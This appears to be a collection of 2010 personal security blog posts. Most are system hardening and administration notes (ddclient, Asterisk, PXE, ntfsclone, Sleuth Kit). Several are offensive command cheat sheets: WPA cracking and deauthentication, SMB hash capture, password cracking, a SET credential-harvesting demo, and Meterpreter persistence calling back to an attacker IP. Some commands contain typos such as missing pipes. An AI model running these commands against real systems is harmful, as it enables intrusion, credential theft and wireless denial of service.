fwknop: error while loading shared libraries: libfko.so.0: cannot open shared object file: no such file or directory

then you may need to create a symlink in the /usr/lib directory for the library file:
# cd /usr/lib
# ln -s /usr/local/lib/libfko.so.o.o.2 libfko.so.0

To authenticate using client:
# fwknop -D 192.168.0.5 -s -A tcp/22

There is also a windows client you can get here

Resources / Good Reading:
http://pauldotcom.com/wiki/index.php/Episode221
http://www.cipherdyne.org/fwknop/

Linux / Ubuntu hardening tips

2010-11-19T10:01:00.000-08:00

Here are some tips that you can use to harden the security of your systems.

Its a good idea to divide your file system into various partitions to fine tune permissions and functionality. Also aids in linux OS migration and backup as well.

Set a BIOS password ONLY. Sure you can also set HDDlock passwords to password protect your hardisks which is good but there is one downside to doing so. If your computer was stolen and your system requires a password to bootup (or unlock the hard disks) , provided that you used a secure password, chances are that this predator would not be able to boot into your machine at all. He then may dispose of this machine or just simply get a new hard drive. When either of these happen, you can pretty much kiss this machine good bye as it would be almost impossible to recover. What i prefer to do is to just set a BIOS password so that no one can make changes into the BIOS but are able to still boot into the OS into a restricted account. Once the machine gets an internet connection our hidden "prey" software that i discussed in the previous blog post can do its job and start reporting information to us. This setup might not be applicable for businesses but for a typical home user, i think it should do fine (who wouldn't want to catch the culprit and recover their stolen goods in the process? :P ).

You would also want to set the boot priority to boot from your hard disk first and not removeable media. This aids in preventing the use of live linux CD's or removeable media from being able to boot and mount your hard disk. With your BIOS password set, modifying the boot sequence of your computer would become a daunting task to the average user trying to do so. Although you can get around this easily by taking out the hard disk so the computer boots from its next boot device, not everyone would think about doing so, therefore this helps in giving you some security.

Perform an update as soon as you install your new OS. These commands should do: # apt-get update && apt-get upgrade

Enable Automatic updates. Would want to schedule your updater to check for updates at least once a week. Would also suggest that you allow the OS to automatically download and install updates wihtout confirmation when available.

Download and install your preferred firewall (i recommend firestarter). Go ahead and block incomming connections. the only connections that should be allowed through your firewall is traffic that was originally initiated from your box.

Download and install a virus scanner (clamav should do). Most viruses are for windows so chances are you wont get infected. However, you can potentially be hosting a virus that may or may not spread onto other hosts. For instance, you may have an infected pdf file that you can open in linux and have to effect what so ever because the exploit was designed for a windows system. If you decide to carry this file with you on a usb key and copy it on the windows system that virus would now stand a much better chance to infect its windows host.

I recommended using firefox for the best web browsing security. You would want to install the "noscript" plug-in for added security against scripting attacks.

Refrain from using the root account. Create a new user and give priveleges to this user via the sudoer file using the command "visudo" to modify it. Try to be restrictive as possible. If you give yourself too much priveleges and your account was to be compromised, then its game over.

After you do a fresh install of Ubuntu and did all the updates, you would want to generate a list of all installed programs as a baseline. You can do this again later then compare it to your baseline and note the differences. Chances are you may spot some programs that shouldn't be there. The command that i use to generate this list is :
# dpkg --get-selections | grep -v "deinstall" > Installed_Baseline-`date +%F`.lst

Remove unecessary services especially the ones that start on boot. Identify the services that you do not need and remove them.
example: # sudo /etc/init.d/cups stop && update-rc.d -f cups remove

As mentioned above, i would recommend having some sort of locked down guest account. This way, if my laptop was to get stolen, its in me best interest to want to allow them easy access into my system where they can connect to the internet and browse the web. This way my "prey" software can report on my laptops where abouts so i have a great chance of recovering my PC

Install "prey". You can read about it in my previous post. This here puts your mind at ease knowing that if your machine gets stolen, there is still hope that you can recover it.

Always try to have some type of log management strategy. Search or create scripts that would parse through your log files and extract relevant information. Getting this right can be time consuming but may pay off one day. Try to log as much as possible. The more data you have, the more you have to work with.

By default all user home directories created with the adduser utility will have world read/execute permissions. This is not very desirable from a security stand point. To verify every users home directory permissions: # ls -ld /home/*.
Far added security do : # sudo chmod 0750 /home/username

Avoid using default service ports. For example, your default ssh server install will more than likely listen on port 22. Its in your best interest to put this on some random port number like 26374. Hackers may see port 22 and automatically assume that theres an ssh server running in the background but seeing port 26374 might make there lives a little bit harder in trying to identify the type of service listening on this port. Sometimes they might just not bother putting in the extra effort into getting into that system as things aren't as trivial for them.

Lock down your services and applications. As an example with ssh, i like to restrict root logons, restrict password authentication once i get public key authentication working and force the usage of ssh protocol version 2.

Resources/Good Reading:
https://help.ubuntu.com/9.10/serverguide/C/security.html

preyproject.com - Things you can do to aid recovering one's stolen laptop part 2

2010-11-18T06:24:00.000-08:00

Continuing from my last post, i wanted to speak on an open source project called prey.
From the website itself, preyproject.com, it states "Prey lets you keep track of your phone or laptop at all times, and will help you find it if it ever gets lost or stolen. It's lightweight, open source software, and free for anyone to use. And it just works."

It is available for Linux, Windows, Mac OS and the Android platform as well.

These are the steps involved in getting it set-up for Windows:

Download and install the software
In configuration, choose to set up reporting method
Choose the recommended option "Prey + control panel"
Create a new user and follow remaining steps
Log into newly created account on preyproject.com
Click on your device
Make necessary changes here then goto "Modules" to configure those (very important)
The Modules section is where you tell prey what information to collect if your PC is stolen. Make necessary changes here
Click on "Save changes"
To test your system out, switch back to "Configuration" view and turn on the "Missing?" option. This tells prey to start doing its thing and start reporting the information you requested.

For Ubuntu linux users:

Download the .deb installer from the main website
install using: # dpkg -i prey_0.4.4-ubuntu2_all.deb
If the install complains about dependencies like mines install them. For example, i installed my dependencies like this: # apt-get scrot streamer mpg123. Scrot is a screeshot capture program, streammer is a video and audio capture utility and mpg123 is a command line mp3 player.
Verify your crontab entry: # crontab -l
Verifythat the cron service is running: # /etc/init.d/cron status. If cron is not running it may not be configured to run on system bootup unless you purposely disabled it. You can add it to the startup scripts like so: # update-rc.d cron defaults. Then verify again that its running: # /etc/init.d/cron status
If the GUI configurator tool does not launch, you will have to manually configure the options. Edit the /usr/share/prey/config file (make a backup of original before). You would want to add the api_key and the device_key values that you get when you're in your prey account. I also set randomize_check_host='y' and commented all the ssh, smtp, sftp and scp options near the bottom as well.

The way the prey system works is that when your stolen laptop is connected to the internet, the prey client that was previously installed will be silently and stealthily be periodically phoning home to the mothership looking for instructions (Even when you are not connected to the internet it periodically attempts this as well). The intervals in which prey does this "phoning home" can be configured on your machine "Goto start menu -> All programs ->" prey -> Configuration". When it phones home it checks for instructions, specifically if that "Missing?" option that we set in step 10 is set to on. If its set to off then it does nothing and goes back to sleep until its next periodic cycle. If when it phones home and see that the missing option is set to "on", then it starts collection the information that you configured in the modules (step 8) and send them to the prey servers where you and only you can review them when you log into your preyproject.com account. This information can include its location, hardware and network status and optionally trigger specific actions on it such as locking the computer (a pre-assigned password would be required to unlock it) or deleting browser cookies and cached stored passwords.

Resources / Good Reading:
preyproject.com

Things you can do to aid recovering one's stolen laptop part 1

2010-11-18T05:42:00.000-08:00

I was inspired by a presentation i saw on securitytube.net, "Pwned by the owner", presented at defcon 18 by Zoz. The presenter gave us his story of an incident where his laptop was stolen by an individual and the series of the things that he was able to do that led to its recovery. It was a very interesting and eye opening presentation that i would encourage all to watch.

In summary, as a result of a few services that were running silently in the background, he already had a foot into his system. He had some sort of dyndns client running on his system that sent all updated public IP addresses to his dyndns account. What this means is that whenever his laptop was connected to internet at any location, the dyndns client will detect any changes to its public IP address and update your dyndns account record. With this IP address you can do a reverse lookup of the IP address, find out location information and the current ISP of the connected node (Can also contact the ISP and report this to authorities). In some cases given the right software, if your laptop is connected via wifi, it is possible to get an idea , within reasonable distance, of where your laptop is on the map (like phone navigation with no built-in gps reciever).

When Zoz discovered that his dyndns account recorded a new IP, he proceed to do nslookups did pings at multiple times until he recieved a response (this can be scripted as well so you can be notified when the host is up. Think of a bash script with a cron job). When he finally got ping replys and his host was up, he then attempted to connect to some of the services that he had running on his box before it was stolen. These services included ssh and vnc. As it was his laptop he knew all the required passwords so he eventually had inside access. From then on here, he did some recon. He was able to find out pictures of the criminal that were stored on the hard drive. A history of his browser cookies and browser history cache gave us a profile of this criminal (seems like he was into dating sites and lots of porn). What was left to do at this point was to get a street address. Although the public IP can give you the city that the individual resides in, it more than likely will not give you more than that. Finding an exact location was next on Zoz's to do list.

A keylogger was implemented on his system and as you would guess, all usernames and passwords were obtained for the sites he was registerd to, including porn sites and ebay. By investigating the return shipping address of his ebay account, the relevant addressing information was obtained and the authorities then were able to detain the thief.

As soon as i completed watching this presentation i was a little paranoid and wanted to immediately prepare myself for such an incident. Zoz was lucky to obtain the Public IP from his dyndns provider. Without that, he would have no apparent lead and would've been left with a broken heart and lots of regret.

Resources / Good Reading:
pwned by the owner

Dyndns client (ddclient) for linux

2010-11-17T11:08:00.001-08:00

Ddclient is a small piece of software that you install to your computer that updates your dyndns account with your current IP address. If your external IP address changes, this program will automatically notify dyndns.com of the change and update your account information seamlessly.

To install: # apt-get install ddclient

After you install it and provide the relevant information on setup, you will want to verify and or modify the config file (/etc/ddclient.conf)

This is what mines look like

# Configuration file for ddclient
#
# /etc/ddclient.conf

daemon=300 # check every 300 seconds
syslog=yes # log update msgs to syslog
pid=/var/run/ddclient.pid
ssl=yes
protocol=dyndns2
### Select one of these options to determine your IP address
## via hardware interface (if you don't have a router/firewall)

## For local IPs. You probly wouldn' have any use for this unless your computer was connected directly to the modem.
#use=if, if=eth0
## via our CheckIP server. This is a good choice that i use
use=web, web=checkip.dyndns.com/, web-skip='Current IP Address: '

## from the status page for a linksys router/firewall

#use=linksys, fw=linksys, fw-login=admin, fw-p

## settings for DynDNS account holders
################################################################
server=members.dyndns.org
protocol=dyndns2
login=[login]
password=[password]
yourdns.dyndns.org

## settings for OpenDNS account holders
######################################################
#server=updates.opendns.com
#protocol=dyndns2
#login=[login]
#password=[password]
#yourdns.opendns.com

You may also need to verify one setting in the /etc/defaults/ddclient file. You would want to confirm that "run_daemon=true" is set.

After you made all changes, restart the daemon: # /etc/init.d/ddclient restart The service will start on system boot and continue to run in the background.

# /etc/init.d/ddclient status

Status of Dynamic DNS service update utility: ddclient is running

Every few minutes (configurable) the service will check to see if there is a change in your external IP address and if there is, it will send that updated information to your dyndns service provider using your already provided account credentials.

You would then want to log into your dynamic DNS service provider account and verify that your external IP now is up to date.

[update]
I've ran into an issue where one of my ddclients refused to update my dyndns account. I ran it in debug mode like so:
# sudo ddclient -debug -login=username -password='pass' -noquiet -verbose

The ouput of the command was impying that my ip address hasn't changed so it was skipping the update process. However when i log into my dyndns account, my ip address was different. This is because im running the ddclient on a netbook that i take everywhere and when its connected to the internet, it updates that record. The reason that my other machine was not update my dyndns account is becasue of a cache file that was stored. By removing this cache file, it fixed my problem.

# sudo rm /var/cache/ddclient/ddclient.cache

Simple asterisk setup

2010-10-07T05:39:00.000-07:00

Asterisk is an open source telephony system or PBX (private brach exchange). What this means is that you can setup your own telephony system at home, where you can call phones internal (like dialing extensions in a business) and also make outgoing calls to the outside world. The system can interface with almost any type of telephony hardware and can speak many communication protocols.

Below is a quick list of commands and configs that i've used to install asterisk and connect two softphones to the system.

Tested on Backtrack 4 (Will be installing on a Ubuntu 10.04 later).

Get the dependecies asterisk may require:

# apt-get -y install build-essential libncurses5-dev libcurl3-dev libvorbis-dev libspeex-dev unixodbc unixodbc-dev libiksemel-dev linux- headers-`uname -r`

Then insall asterisk:

# cd /usr/src

# wget http://downloads.digium.com/pub/asterisk/asterisk-1.4-current.tar.gz

# tar -zxvf asterisk-1.4-current.tar.gz

# cd asterisk-1.4-current

# ./configure && make && make install && make samples

Then we can configure our sip.conf, and extensions.conf as follows

##### sip.conf #####

[general]

port = 5060

bindaddr = 0.0.0.0

context = default

[100]

type=friend

context=incoming-calls

secret=100

host=dynamic

[101]

type=friend

context=my-phones

secret=101

host=dynamic

################

##### extensions.conf #####

[others]

[incoming-calls]

exten => 100,1,Dial(SIP/100,10)

exten => 101,1,Dial(SIP/100,10)

################

You will have to configure your softphones to match the settings in the sip.conf file

References / Good Reading:

http://www.the-asterisk-book.com/unstable/minimale-telefonanlage.html

Network Booting a linux machine (PXE)

2010-09-20T05:36:00.000-07:00

What exactly is this that i speak of? Think of booting up a machine with no hard-disk or cd drive. Of course you can do this with USB but if you have 5 diskless and cd driveless machines, that would mean you would need 5 unique USB drives to boot us a live linux OS. However, with network booting you can boot such diskless machines from one central server. This means administration is reduced to one central machine that all machines can boot from. It is also possible to boot a machine over the internet as well.

What i require on the server end is a pxe server. This will comprise of some services, mainly a tftp server and dhcp server and in some cases nfs or http server. In this example i will show you the most basic method for network booting a linux OS (tftp/dhcp server combo).

Note: I recomment using tftpd-hpa server over atftpd that comes with backtrack 4. Atftpd has a file size limitation in which it can download. Not sure exatcly what it is but i ran into a problem in downloading the initial ramdisk for ubuntu with syslog complaining about atftpd's inability to download certain sized blocks.

Will be using a simple linux OS called Tinycore

dhcpd.conf :

allow booting;
allow bootp;
default-lease-time 360;
max-lease-time 720;

subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.2 10.0.0.5;
option subnet-mask 255.255.255.0;
option routers 10.0.0.1;
option broadcast-address 10.0.0.255;
option domain-name-servers 10.0.0.1;
filename pxelinux.0;
nexe-server 10.0.0.1;
}

The filename portion is very important and is the bootloader that should be loaded over the network
The next-server specifies the tftp server that houses the bootloader.

Start up the dhcp server.

Set up the tftpd server. I usually do this from the commandline
# in.tftpd -l -v -s /root/tftpboot/

Copy the initrd and kernel files to the /root/tftpboot folder specified in your tftp service.
You would need to get the bootloader, gpxelinux.0, from syslinux packages. Just download syslinux and copy this file to your /root/tftpboot/ directory. Create a directory "pxelinux.cfg" and create a default text file with the following.

Prompt 0
Timeout 0
LABEL tinycore
KERNEL vmlinuz
APPEND initrd=initrd.gz

Now if your client's machines motherboard supports booting from lan, select this option in the boot menu and all should go well.
For PC's that do not support booting from lan, you can burn a gpxe image onto your usb key so your usb key would act like the pxe client. Head over to http://www.rom-o-matic.net/ and get a copy of the usb compatible gpxe image. Copy onto thumbdrive using dd:
# dd if=gpxe.img of=/dev/___.

Resouces/Good Reading: http://etherboot.orghttp://syslinuxzytor.com/wiki/index.php/PXELINUX

Using Netcat and a symmetric algo (AES or 3DES) for secure commnuications

2010-09-12T07:39:00.000-07:00

I was messing with netcat (again) transfering files back and forth from computer A to B. I know that the file transfer are indeed not secure and are transfered in plaintext and wanted to have netcat remedy this. Although there are secure alternatives to netcat (cryptcat and sbd), i love netcat, after all, netcat fathered most of these other tools. Plus i wanted a challenge. I wanted to use openssl's symmetric cyphers to encrypt data transfered through netcats client/server nodes.

Simple enough, it didn't take me long to put things together

Client:

# openssl enc -aes128 -nosalt -pass pass:mypass -in file.txt| nc -q 1 10.0.0.1 80

Server:

# nc -lvp 80 | openssl enc -aes128 -d -nosalt -pass pass:mypass -out file.txt

Ntfsclone, Backup/Restore ntfs partitions

2010-08-31T19:21:00.000-07:00

So i did a fresh install of xp and installed a couple apps and wanted to make an appropriate backup image using linux. Being the Backtrack user that i am, the popular choice of backup/imaging known to me at the time were the programs dd or partimage. For my purposes, dd would'nt be a valid choice as it will back up used space as well as unused space, so i was left with partimage.

Partimage is a great program, but support for ntfs file systems were experimental. However, i proceeded to try it out and all went fine, the backup was succesful. However, i didn't want to risk trying a restore and lose everything on that partition (as docs said the support for ntfs was experimental). I then turned to google to find a reasonable alterative.

A few minutes after, i learned of ntfsclone (and its already installed on backtrack 4 as well). Ntfsclone will do as the name says, clone ntfs drives. You can clone to an image file, disk or stdout (useful for piping to programs like split, gzip, bzip etc) . It had the major feature i was looking for that was also present in partimage; the ability to backup only the used blocks of data on the partition and not the entire partition itself. Actually, it backs up the used space on the partition and fills the rest of the image with zero's which makes for easy compression.

Usage is quite simple

To make clone of partition 1 on device sda
# ntfsclone --save-image -o /mnt/usb/disk.img /dev/sda1

To restore image
# ntfsclone --restore-image -O /dev/sda1 /mnt/usb/disk.img //note we are using the capital O in the options to overite the destination /dev/sda1 if existing

Because of the file size limit (4G) on fat32 formatted disks, if you are cloning any drive bigger than four gigs and wanted to copy the saved image to a fat 32 disk, you will therefore run into issues. To overcome this, the following commands can be utilized.

# ntfsclone --save-image -o - /dev/sda1 | split -d -b 1000m - XPSP2.img_ // the '-' will cause ntfsclone to output to standard out. The split utility will split the data every 1000 megabytes (1 gig) from its standard in '-' and output to files with the prefix XPSP2.img_ and because of the '-d' option, numbers will be appended to the individual files. Example: XPSP2.img_01, XPSP2.img_02, XPSP2.img_03.

Just something important to note, taking from the article here:

If you want to copy, move or restore a system or boot
partition to another computer, or to a different disk or partition (e.g.
hda1→hda2, hda1→hdb1 or to different disk sector offset) then you will need to
take extra care.

Usually, Windows will not be able to boot, unless you
copy, move or restore NTFS to the same partition which starts at the same sector
on the same type of disk having the same BIOS legacy cylinder setting as the
original partition and disk had.

The ntfsclone utility guarantees to
make an exact copy of NTFS but it will never deal with booting issues. This is
by design: ntfsclone is a filesystem, not system utility. Its aim is only to
clone NTFS, not to clone Windows. Therefore ntfsclone can be used as a very fast
and absolutely reliable building block for Windows cloning, but itself it's not
enough.

Resources/Good Reading:
http://www.linux-ntfs.org/doku.php?id=ntfsclone

Advanced tcpdump Kung-Fu

2010-08-27T05:47:00.000-07:00

So i was messing with tcpdump again and needed a quick refresher on filters. I went back to one of my blog posts and some other resources i found on google and quickly got up to speed. I wanted to take things a little it further however and looked to get creative.

I started out by filtering icmp packets. I wanted to only see ping request packets coming to me. So i created the filter as follows:

# tcpdump -ni eth0 'icmp and (icmp[0] = 0x08)'

I then only wanted to extract the ip address of the host sending those icmp requests

# tcpdump -lni eth0 'icmp and (icmp[0] = 0x08)' cut -d " " -f 3 //Note that the '-l' option must be included to make stdout line buffered

With this information, i imagined taking things a lil further. What i then wanted to do was to block any machine that was sending icmp echo requests. I then remembered that honeyport script that was in a recent pauldotcom segment (I also blogged about it recently as well. Its really kool).

So the script went like this:

while [ 1 ];
do IP=`tcpdump -c 1 -lni eth0 'icmp and (icmp[0] = 0x08)' cut -d " " -f 3`;
echo -e "\n${IP} is pinging you.";
echo -e "Blocking IP: ${IP}";
iptables -A INPUT -p tcp -s${IP} -j DROP;
iptables -A INPUT -p icmp --icmp-type 8 -s ${IP} -j DROP && echo -e "Blocked...\n";
done

Then give the script file executable rights then let her rip.

The next small project i did was filtering out traffic coming from the server, but only the data that has the tcp flags PUSH or ACK set. I was using the edna music server for demonstration purposes and it defaults to port 8080.

So in one terminal i had my tcpdump sniffer set up like this:

# tcpdump -w dump.pcap -s0 -ni eth0 'tcp adn src port 8080 and ((tcp[13] = 0x18) or (tcp[13] = 0x10))'

So the idea behind this is that when a client connects, request a song and streams it, i can be the man in the middle just pulling the data that is sent back to the client in a stealthy manner. When you're finished with your sniffing session you can combine some command line tools to retrieve your data

# tcpflow -C -r dump.pcap strings grep "Content-Type" cut -d " " -f 2 sort //this gives you a list of the content types that were sent to the client. Note that -C prevents tcpflow from outputting the different streams into files, instead just displays the data on standard out.

# tcpflow -C -r dump.pcap more -d // after you issue this command you can hit the h key to get helpfull commands. The "/" is a common option used when you want to do regex searches through the data

Just another kool thing you can do on the fly to see the URLs that are being requested

# tcpdump -lni eth0 'dst port 53'cut -d " " -f 8

If you wanted the ip addresses of the clients as well, you can have another tcpdump window running simultaniously along with the above (Have then running side by side, line by line so interpretation is more efficient)

# tcpdump -lni eth0 'dst port 53' cut -d " " -f 3

WPA rainbow tables with cowpatty and aircrack-ng suite

2010-08-18T10:19:00.000-07:00

No introduction necessary. If you do not know what a rainbow table is then you will just have to use google or read some of my previous posts.

[using cowpatty suite]

# ./ genpmk -f wordlist.lst -d hash_tables.lst -s "linksys" //Generates a salted rainbow table using the wordlist file and the ssid name "linksys"

# ./cowpatty -d hash_tables.lst -s "linksys" -r wpa.pcap //command to crack the WPA key using the rainbowtable and the pcap file

[using aircrack-ng suite]

# airolib-ng table.db --import essid ssids.lst // creates a new database and imports the ssids to be used as salts

# airolib-ng table.db --import passwd wordlist.lst //imports the wordlist/passwords into the database

# airolib-ng table.db --batch //performs all the necessary processing of the essid and password combination

# airolib-ng table.db --verify //verifies the integrity of the ssid/password pairs

# aircrack-ng -r table.db wpa.pcap //command to crack the WPA key using the rainbowtable and the pcap file

Cracking challenge and response lm/ntlm hashes

2010-08-16T05:34:00.000-07:00

The Challenge and response hashes that i'll be cracking occur over protocols such as SMB/CIFS on Windows systems. When a user tries to access a remote share, he must first try to authenticate with that remote system. The client says "hello, i would like to communicate with you"; the server responds with a challenge which composes of random data; the client then takes this challenge and uses it to encode its user's lm/ntlm hash then sends the results back to the server; The server then uses the same random challenge and the response sent back by the client to derive the lm/ntlm hash of the user then compares this to its SAM database to see if this user is a valid user on the server.

The server portion of such a system can be modified to respond with a static challenge instead of issuing a random challenge for every client request. By doing so, cracking via rainbow tables becomes favorable and wordlist/bruteforce attacks become viable as well. Because of the use of random challenges per client request to the server, cracking became very difficult as the challenge had to be known and then be incorperated into the cracking program. Having a static challenge thus solves this difficulty.

More information can be found on google and here

Metasploit can be used to capture these hashes and John the ripper can be used to crack them

[metasploit]

# msfconsole

msf> use auxilliary/server/capture/smb

msf auxilliary(smb)> run

[John]

# ./john --format=netlm --wordlist=passwords.lst halmlmhashes.txt

The challenge and response hashes must be saved in the following format to be suitable for cracking using john:

user:::LM_HASH:NT_HASH:STATIC_CHALLENGE
Example:
admin:::A37C5C9316D9175589FDC21F260993DAF3644F1AAE2A3DFE:A37C5C9316D9175589FDC21F260993DAF3644F1AAE2A3DFE:1122334455667788

Reesources/Good Reading:

http://www.foofus.net/?page_id=63

Honeyport script

2010-08-09T16:58:00.000-07:00

I was listening to a pauldotcom podcast (see www.pauldotcom.com), episode 204 and they had a very interesting tech segment called Honeyports on linux (see episode 203 as well for honeyports on windows). The basic idea behind this is the block a potential malicious person via his ip address from accessing your system. This can also work in some situations where an attacker is performing a TCP scan of your machine that actually goes through the entire 3 way TCP handshake and by doing so, trigger our Honeyport script and automatically add a firewall rule to restrict that IP address from further establishing any TCP communication to our machine.

The script is also very simple and elegant.

#!/bin/bash

while [ 1 ] ;
echo "started" ;
do IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`;
iptables -A INPUT -p tcp -s ${IP} -j DROP ;
done

Good Stuff from John Strand and the pauldotcom crew for comming up with something so simple, yet so elegant and usefull.

Resources/Good Reading:
http://pauldotcom.com/wiki/index.php/Episode204

Using Ophcrack from da command line

2010-08-08T12:10:00.000-07:00

First off, you need some rainbow tables (Get the ophcrack tables to avoid compatibility issues) from http://ophcrack.sourceforge.net/tables.php.

You can also get the ophcrack program from that site as well.
I will be using BT4 which already has the ophcrack preinstalled.

unzip the rainbowtables into a folder.
Note: This here assumes you have your password hashes in the proper format as well. Programs such as pwdump6 and fgdump are good ones that produce compatible output for use with ophcrack.

command:
# ophcrack -g -d path_to_rainbow_tables_dir/ -t path_to_rainbow_tables_dir/ -n 4 -f hashes.txt

'-d' - Path to rainbow tables
'-g' - do no run the GUI interface
'-t' - specify which table to use. Just putting the dir path to the table works for me
'-n' - number of threads to use
'-f' - path to hashes file obtained from programs like fgdump or pwdump

Of course you can always use the GUI by just typing 'ophcrack' from the command line.

Hashcat

2010-08-06T05:53:00.000-07:00

Have those hashes and wanna crack em faster than any other open source password cracker out there? You would definitely want to take this tool for a spin. This tool is very comparable to John the ripper with a number of supported hashing algorithms and word mangling rules that you can throw at it. For more info, check out the authors website at http://hashcat.net.

You can generate your own hashes to crack: # echo -n "password" | openssl md5 > hash.txt

To crack SHA1 hashes using a wordlist:

# ./hashcat-cli.bin -a 0 -m 100 hashes.txt wordlist.lst //crack sha1 hashes in hashes.txt

To perform a bruteforce attack for the MD5 hash:

# ./hashcat-cli-bin -a 3 -m 0 --bf-pw-max=4 hash.txt //bruteforce the md5 hashes in hash.txt with a password length max of 4

# ./hashcat-cli.bin -h //for more help and options

Resources / Good Reading:

http://hashcat.net

https://contest.korelogic.com/team_hashcat.html

Demo-ing the power of SET (Social Engineering Toolkit) framework

2010-07-11T16:56:00.000-07:00

Social Engineering Toolkit Demo **part 1** ....

This demo will show you how you can easily gain user credentials (username and passwords) from popular social websites, in our example today, www.gmail.com

The steps involved as outlined in my video are simple to follow

1. launch SET framework and make the necessary selections for th etype of attack that you're tryna accomplish

2. Goto the victim machine and browse to the attackers IP (or more realistically, you can force a user to come to you when they attempt to goto gmail.com themselves with a combination of arp poisoning and dns spoofing)

3. On attackers machine analyze results and see what information was obtained

Social Engineering Toolkit Demo (Credential Harvester) from aerokid240 on Vimeo.

Social Engineering Toolkit Demo **part 2** ....

This demo will show you how you can combine the use of self signed java applets and payloads to gain remote access of a system.

Note: User must accept or run the java applet in order for this to work which 98% of users do anyways.

Social Engineering Toolkit (java applet) from aerokid240 on Vimeo.

Resources/Good Reading:
http://www.secmaniac.com/
http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit

Upgrading from shell to meterpreter and then adding persistence

2010-06-17T07:29:00.000-07:00

Say you compromised a box and installed a backdoor that provides you with shell acess. You connect to the backdoor listener and would like to do alot more than what the windows command prompt will allow you to do. Like most of us, we will want access to the meterpreter ("Google meterpreter if you don't have a clue what it is"). We can perform an upgrade on our regular shell to a meterpreter session using metasploit.

you can follow the examples on:
http://pauldotcom.com/2010/04/using-meterpreter-to-control-n.html

Just a quick summary.
After you connect to the listener on victim machine:
[ctrl z] to background the session
# setg LHOST ip_addr //this the ip of machine of the attacker with metasploit
# setg LPORT port_num //set port num to use for the upgraded session
# session -u 1 //where one is the session number of the regular shell session

IMPORTANT:
I've only gotten this working when the victim machine had the backdoor or service waiting for shell connections, meaning that when i compromised the box, i used a bind_shell payload or the victim had some kind of listener that would give you shell access when connected like netcat. I could not get this working when using a reverse_tcp shell payload initially.

When you have a meterpreter session, to add a persistent reverse connecting meterpreter client you can use the "persistence" script with options as follows:

meterpreter> run persistence -A -i 5 -p 4444 -r 192.168.1.53

'-A' : Automatically starts a mtaching multi/handler to connect listen for incoming connections
'-i' : Interval in seconds between each connection attempt
'-p' : port on the remote host where metasploit is listening
'-r' :IP of the system running the metasploit listener

if you opted to not use the '-A' option, you can always start up the multi/handler manually

# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lport=4444 lhost=192.168.1.53 E

I've had one instance where when i got the reverse meterpreter session connected then disconnected, it refused to automatically connect again. I really had no answer for that problem at the time but what worked for me is that i had to migrate to a process with system priveledges (like explorer.exe) then disconnect. The script then was continually sending its reversing connections as it should back to my metasploit box.

Resources / Good Reading:
http://www.darkoperator.com/
http://pauldotcom.com/2010/04/using-meterpreter-to-control-n.html

WPA/WPA2 PSK cracking quick reference

2010-06-01T08:02:00.000-07:00

There are too many guides and resources out there to doing this stuff so i wont be giving much explanation and theory on WPA hacking. Remember, this should only be performed on networks that you have permission to audit the security of. This here will serve as a quick and dirty cheatsheet of commands necessary to potentially audit the strength/weakness of your wireless networks using the aircrack-ng or cowpatty to bruteforce the password using a wordlist.

# airmon-ng start wlan0 // put interface in monitor mode

# airodump-ng mon0 // scan air for targets

# airodump-ng --channel 1 --bssid "AP_MAC_addr" -w wpa.cap mon0 //filter capture packets from a specific AP's MAC address and channel

#aireplay-ng --deauth 5 -a "AP_MAC_addr" -c "Client_MAC_addr" mon0 //Perform a deauthentication attack on a client to force reassociation in hope of capturing WPA handshake

When Handshake is captured

using cowpatty:
# cowpatty -f passwords.lst -r wpa.cap -s "essid_of_network" //attempt to bruteforce the password using wordlist

using aircrack-ng:
# aircrack-ng -w passwords.lst -e "essid_of_network" wpa.cap //attempt to bruteforce the password using wordlist

Forcefully disconnect a wireless client

2010-05-27T17:26:00.000-07:00

Is it possible to disconnect a wireless client connected to a highly encrypted wireless network? Uhh, apparently yes. I been messing around with the aircrack-ng suite of tools (again) recently and decided to dive deeper into its capabilities. In a past blog, i wrote briefly about aircrack-ng and cracking WEP keys. I didn't speak in depth about its features then but would like to add just a little bit more. This time i'll be showing some commands that i've used to disconnect one of my wireless laptops, using a netbook that wasn't even autheneticated or connected to my wireless router. What this means is that any user can do a drive by in his automobile and forcefully cause me to disconnect from my wireless router, and cause a denial of service. This denial of service is for a brief period in time as the wireless clients may automatically try to reconnect to their wireless systems.

First turn your wireless card into monitor mode:
# airmon-ng start wlan0

Then scan the air for wireless AP's and clients
# airodump-ng mon0

When you found a an access point that has a client connected, you can filter your scan. This also sets the interface to operate on that particular channel for injecting packets:
# airodump-ng --channel 9 -b aa:aa:aa:aa:aa:aa mon0

And finally, the injection of death frames
#aireplay-ng -a aa:aa:aa:aa:aa:aa -c bb:bb:bb:bb:bb:bb --deauth 1 mon0

'-a' represents the MAC address of the target access point
'-c' represents the MAC address of the target host

Quick Hands on with TSK (The Sleuth Kit)

2010-05-18T07:39:00.000-07:00

The Sleuth Kit can be characterized as a suite of command line tools that aid in disk image analysis and recovery. It is a free unix package and can be obtained from www.sleuthkit.org. This tool is more in the category of forensics and can aid in uncovering many files and clues etc. Remember, Like any tool, to get the most out of it is dependent on the knowledge and experience of the user to the tool itself.

I wont speak anymore onthe sleuthkit, but rather dive into some of its tools and commands. You can read up more on the suite at www.sleuthkit.org. There is also a nice Web front end to this suite called Autopsy that i may blog about later.

The following examples presumes you already have a disk image, in my case, ill beusing "disk.img". For more options for each program you can type "man program_name" for its man page or "program_name -h" for a brief help page on the program's options

# fsstat disk.img //Displays details of the filesystem contained in the disk image 'disk.img'

fsstat can give you info such as :

the filesytem type (fat16/32, ntfs etc.)
Number of reserverd sectors
Sectors contained withing each fat table and their offset (in sectors)
Root directory offset (in sectors)
Sector and cluster sizes

# fls disk.img // Lists the files and directory names in disk.img. By default, it will display the file names of recently deleted files as well.

# fls -d disk.img //lists ONLY the recently deleted file entries

The fls program will give you the repective inode numbers for each directory/file entry.

# ils -e disk.img // will list the inode information for every inode. If you remove the '-e' option, by default the program will list inode information for only removed/deleted files. The output information is not human friendly but it can be piped to the mactime program for better analysis

# icat disk.img 5 // copies the data occupied by inode 5 in disk.img. You can use the output of the fls program to obtain these inode number to choose from.

# icat -r disk.img 5 // the '-r' option allows for file recovery techniques to recover the file pointed to by inode 5. This option is only useful with deleted inode entries.

